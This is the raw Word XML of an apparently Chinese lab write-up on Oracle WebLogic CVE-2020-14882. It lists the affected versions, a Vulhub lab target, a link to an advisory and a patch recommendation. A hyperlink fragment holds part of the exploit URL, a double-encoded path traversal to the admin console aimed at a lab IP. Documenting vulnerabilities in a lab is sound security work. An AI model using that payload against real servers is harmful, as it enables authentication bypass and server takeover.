                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Oracle WebLogic产品中存在安全漏洞，受此漏洞影响的版本包括10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0，未经身份验证的攻击者可以通过HTTP网络访问WebLogic Server利用此漏洞，成功利用此漏洞的攻击者可以接管当前Oracle WebLogic Server。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="7A09757D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30D4F923" w14:textId="77777777" w:rsidR="00D10029" w:rsidRDefault="00D10029" w:rsidP="00D10029">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto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 w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>参考链接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68BAD" w14:textId="4774AEF4" w:rsidR="00D10029" w:rsidRDefault="00000000" w:rsidP="00D10029">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="00D10029">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                </w:rPr>
                <w:t>【安全风险通告】</w:t>
              </w:r>
              <w:r w:rsidR="00D10029">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                </w:rPr>
                <w:t xml:space="preserve">Oracle </w:t>
              </w:r>
              <w:r w:rsidR="00D10029">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                </w:rPr>
                <w:t>融合中间件高危漏洞安全风险通告</w:t>
              </w:r>
              <w:r w:rsidR="00D10029">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                </w:rPr>
                <w:t xml:space="preserve"> (qq.com)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="4D56432A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57ED302C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靶场信息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DFA40" w14:textId="266EAC9B" w:rsidR="00D10029" w:rsidRDefault="00D10029" w:rsidP="00D10029">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Vulhub/weblogic/</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE-2020-14882</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="2087D341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015B7AE7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POC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9ED3" w14:textId="5CC41263" w:rsidR="00D10029" w:rsidRDefault="00D10029" w:rsidP="00D10029">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如上</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D10029" w14:paraId="190283DE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr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FCDCD" w:themeFill="background2" w:themeFillShade="E5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15C03859" w14:textId="77777777" w:rsidR="00D10029" w:rsidRDefault="00D10029" w:rsidP="00D10029">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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745B" w14:textId="75F6B7C2" w:rsidR="00D10029" w:rsidRDefault="00D10029" w:rsidP="00D10029">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10898B58" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="07B366D5" w14:textId="14F474F5" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318034FD" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:sectPr w:rsidR="008F626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1EE0C" w14:textId="77777777" w:rsidR="00A16FD0" w:rsidRDefault="00A16FD0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1890831B" w14:textId="77777777" w:rsidR="00A16FD0" w:rsidRDefault="00A16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ECA74" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:rPr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1CD6B3" wp14:editId="0565910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6" name="文本框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478B67F" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
                          <w:pPr>
                            <w:pStyle w:val="a3"/>
                            <w:rPr>
                              <w:rFonts w:eastAsia="等线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CD6B3" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="文本框 26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478B67F" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
                    <w:pPr>
                      <w:pStyle w:val="a3"/>
                      <w:rPr>
                        <w:rFonts w:eastAsia="等线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DAF60" w14:textId="77777777" w:rsidR="00A16FD0" w:rsidRDefault="00A16FD0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C435537" w14:textId="77777777" w:rsidR="00A16FD0" w:rsidRDefault="00A16F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AB1A36" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1EDE5368" wp14:editId="52328B75">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="635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16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5C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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48208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5D969B9"/>
    <w:rsid w:val="000A16EA"/>
    <w:rsid w:val="000C5AA3"/>
    <w:rsid w:val="000E35E9"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="002E0079"/>
    <w:rsid w:val="00382B24"/>
    <w:rsid w:val="003D1839"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="004F0D0D"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005358AD"/>
    <w:rsid w:val="00535F24"/>
    <w:rsid w:val="005E7177"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00602634"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00641511"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="00733A06"/>
    <w:rsid w:val="00733DD9"/>
    <w:rsid w:val="007D4FC3"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00853D68"/>
    <w:rsid w:val="008600AC"/>
    <w:rsid w:val="008600DC"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="00890CB4"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="008F6264"/>
    <w:rsid w:val="00925EE0"/>
    <w:rsid w:val="00932005"/>
    <w:rsid w:val="00A107A2"/>
    <w:rsid w:val="00A16FD0"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00AA5F05"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B77728"/>
    <w:rsid w:val="00BC1458"/>
    <w:rsid w:val="00BC2024"/>
    <w:rsid w:val="00C2299C"/>
    <w:rsid w:val="00C86C72"/>
    <w:rsid w:val="00CF0798"/>
    <w:rsid w:val="00D062B2"/>
    <w:rsid w:val="00D10029"/>
    <w:rsid w:val="00D23C3C"/>
    <w:rsid w:val="00D90C5E"/>
    <w:rsid w:val="00E00978"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E40801"/>
    <w:rsid w:val="00E66185"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F06F13"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F44E7D"/>
    <w:rsid w:val="00F649B5"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A8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F1F3E8"/>
  <w15:docId w15:val="{A499769B-8B54-4FF5-BB29-2979B05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Body Tex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2"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after="100" w:line="400" w:lineRule="exact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uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="400" w:lineRule="exact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iPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30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spacing w:before="280" w:after="290" w:line="372" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="黑体"/>
      <w:b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20">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000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qFormat/>
    <w:rPr>
      <w:b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TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a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6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A7">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="WPSOffice1">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia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Theme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E7177"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a9">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00C86C72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8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p.weixin.qq.com/s/34MWLMkMGKPuXtZnIuP_y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172.27.48.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&amp;_pageLabel=AppDeploymentsControlPage&amp;handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%2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826</Words>
  <Characters>4714</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>39</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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forever lazy</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-06T05:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-27T19:45:00Z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F961DC4C1D9B460CAB021EA163E041CB</vt:lpwstr>
  </property>
</Properties>
</file>